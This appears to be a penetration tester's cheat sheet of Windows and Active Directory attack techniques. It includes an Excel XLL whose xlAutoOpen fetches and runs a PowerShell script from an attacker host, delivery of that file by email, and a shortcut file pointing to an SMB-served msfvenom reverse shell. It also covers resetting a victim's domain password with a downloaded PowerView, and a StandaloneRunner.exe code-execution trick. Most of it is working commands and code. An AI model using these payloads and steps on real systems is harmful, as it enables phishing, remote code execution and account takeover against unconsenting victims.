smtp enum

A great way to enum for SMTP service is using nmap, which has a builtin script to do so.

> nmap --script smtp-commands.nse --script-args smtp-commands.domain=target -pT:25,465,587 target 
PORT    STATE    SERVICE
25/tcp  open     smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission

XLL RCE

XLL’s are DLL’s, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents. XLL’s provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL’s can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

• https://github.com/edparcell/HelloWorldXll
• https://github.com/Octoberfest7/XLL_Phishing

To setup the test environment, follow the steps below

• Install Visual Studio, in here, VS 2022 was used, NOTE: Windows SDK needs to be installed
• Install Windows SDK, https://learn.microsoft.com/en-us/office/client-developer/excel/welcome-to-the-excel-software-development-kit, in here, 2013 was used.
• Get a copy of https://github.com/edparcell/HelloWorldXll
• Open up the solution and set the project to use the latest SDK and project version.
• Switch to a Release build
• Setup the project property to include the corresponding include and lib folders

2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB

• Update the code in HelloWorldXll.cpp

#include "stdafx.h"

short __stdcall xlAutoOpen()
{
	system("curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f  -");
	return 1;
}

• Build the project and get the .xll file
• Prepare the serve the reverse shell, you can refer to a powershell reverse shell here: https://meowmeowattack.github.io/notes/4-shell/
• Send the .xll file to the target via email, or if they have a SMTP server open

> swaks --to test1@target --from test2@target --header "Subject: test" --body "check" --attach @test.xll --server target --port 25

Shortcut URL Injection

• Shortcut URL injection can be achieved like below

$url = "file:////attacker/share/shell.exe"
$shortcutPath = "C:\path\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent

• You can generate a reverse shell using msfvenom and serve it using a simple SMB server

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=5555 -f exe > reverse.exe
> impacket-smbserver -smb2support share ./path

ForceChangePassword

On Windows (expecially in an AD environment), a user may be able to change another user’s password via the user’s (or group’s) permissions. More specially, check for the following permissions:

• GenericAll
• AllExtendedRights
• User-Force-Change-Password

This can be achieved using SharpHound: https://github.com/BloodHoundAD/SharpHound and running BloodHound (https://github.com/BloodHoundAD/BloodHound) locally to analyse the AD forest

> SharpHound.exe -c All --zipfilename output.zip

# on kali, setup bloodhound
> apt install bloodhound neo4j
> python3 -m pip install bloodhound

# run, default pass `neo4j:neo4j`
> neo4j console
> bloodhound --no-sandbox

If any of the abovementioned permissions are found, you can change the target user’s password via PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Invoke-WebRequest -URI http://attacker/PowerView.ps1 -OutFile PowerView.ps1
import-module .\PowerView.ps1
$pass = ConvertTo-SecureString 'password123!@#' -AsPlainText -Force
Set-DomainUserPassword -Identity victim -AccountPassword $pass

Now, you can login via the victim user, if PSRemote permission is enabled for the user

> evil-winrm -i target -u victim -p 'password123!@#'

StandaloneRunner.exe

StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems. It allows developers to execute and debug driver packages in a standalone environment without needing to install them on a target system. The binary can often be found on the following paths

C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x86\standalonerunner.exe

• There is an arbitrary code execution vulnerability of the StandaloneRunner.exe
• Read more here: https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md

# copy standalonerunner.exe and standalonexml.dll to a directory
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe" standalonerunner.exe
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.dll" standalonerunner.dll

# Create a file named reboot.rsf in the same directory and fill with some content
echo testdir > reboot.rsf
echo True >> reboot.rsf

# Create the required folder structure
mkdir testdir
mkdir testdir\working

# create a rsf.rsf file in the working directory
echo 1 > testdir\working\rsf.rsf

# Create a command.txt file in the current directory and fill it with the command to execute
echo "c:\temp\shell.exe" > command.txt

Windows folder/file enum by keyword

To locate file/folder permissions with a certain keyword, one can use the following commmad

> ICACLS "C:\*." /T /C 2>$null | findstr "keyword"